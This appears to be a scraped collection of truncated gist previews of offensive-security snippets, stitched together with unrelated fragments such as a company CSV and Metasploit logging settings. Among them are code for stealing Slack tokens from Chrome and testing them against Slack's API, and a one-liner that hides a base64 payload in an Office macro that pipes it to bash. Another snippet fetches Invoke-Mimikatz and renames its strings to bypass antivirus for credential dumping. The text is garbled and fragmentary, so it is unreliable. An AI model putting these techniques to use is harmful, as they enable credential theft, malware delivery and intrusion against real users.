In your ~/.msf directory, create a file msfconsole.rc
set ConsoleLoggin true
set LogLevel 5
set SessionLoggin true
set TimeStampOutput true
set PROMPT %T %L
For bash
#!/usr/bin/env python | |
''' | |
Just a python re-write of a tool by akerl | |
https://blog.akerl.org/2018/03/15/stealing-slack-creds-from-chrome/ | |
https://github.com/akerl/limp | |
# user profiles | |
for tok in $(python3 slack-jack.py); do echo "Trying $tok"; curl -s https://slack.com/api/users.profile.get\?token\=$tok -H'Content-Type: application/x-www-form-urlencoded' | jq ; done |
import netaddr, ipaddress | |
def file_to_array(fname): | |
with open(fname) as f: | |
farr = [l.strip() for l in f if l.strip()] | |
return farr | |
def cidrs_to_hosts(input_arr): | |
output_arr = [] | |
for e in input_arr: |
package main | |
import ( | |
"io/ioutil" | |
"os" | |
"os/exec" | |
"strconv" | |
"syscall" |
#!/usr/bin/env python | |
# pip install python-ldap | |
import sys, ldif | |
def main(): | |
if len(sys.argv) != 3: | |
print("Usage: %s <ldif_dump.ldif> <outfile>") % sys.argv[0] | |
sys.exit(-1) | |
ldif_file = sys.argv[1] |
domain,name,keywords,description,twitter | |
walmartstores.com,Wal-Mart Stores,"SEC filing,Walmart photos,walmart stock,sustainability index,Wal-Mart,walmart annual reports,Walmart responsibility,executive speeches,walmart suppliers,global responsibility,walmart global sustainability report,walmart investors,Walmart interactive map,walmart history,privacy policy,financial reports,walmart news,Wal Mart,walmart sustainability,Walmart locations,Walmart videos,walmart story,Walmart,Walmart stores,walmart board of directors,community giving,walmart careers,Walmart jobs,sam walton","Find Walmart executive speeches, financial reports, press releases, downloadable photos and videos, and see an interactive map of our locations around the world.",walmart | |
gm.com,General Motors,,"General Motors is home to Buick, Cadillac, GMC and Chevrolet. Find the latest news about GM automotive innovations, investor relations and more. ",GM | |
ge.com,General Electric,,,generalelectric | |
chevron.com,ChevronTexaco,"cvx, chevrontexaco, cheveron, |
# save oneliner as macscript.txt | |
$f=macscript.txt; echo "Dim s As String\n"; for each in $(base64 -w0 <<< $(cat f) | fold -w 90); do echo "s = s + \"$each\""; done | sed '0,/\ s\ \+/{s/\ \+//}'; echo 'MacScript "do shell script "" echo " & s & " | base64 -D | bash "" "'; echo 'End Sub' |
using System; | |
using System.IO; | |
using System.Text; | |
using System.IO.Compression; | |
using System.EnterpriseServices; | |
using System.Collections.Generic; | |
using System.Runtime.InteropServices; | |
using System.Security.Cryptography; | |
# AV Bypass to run Mimikatz | |
# From: https://www.blackhillsinfosec.com/?p=5555 | |
# Server side: | |
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 | |
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 | |
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 |
In your ~/.msf directory, create a file msfconsole.rc
set ConsoleLoggin true
set LogLevel 5
set SessionLoggin true
set TimeStampOutput true
set PROMPT %T %L
For bash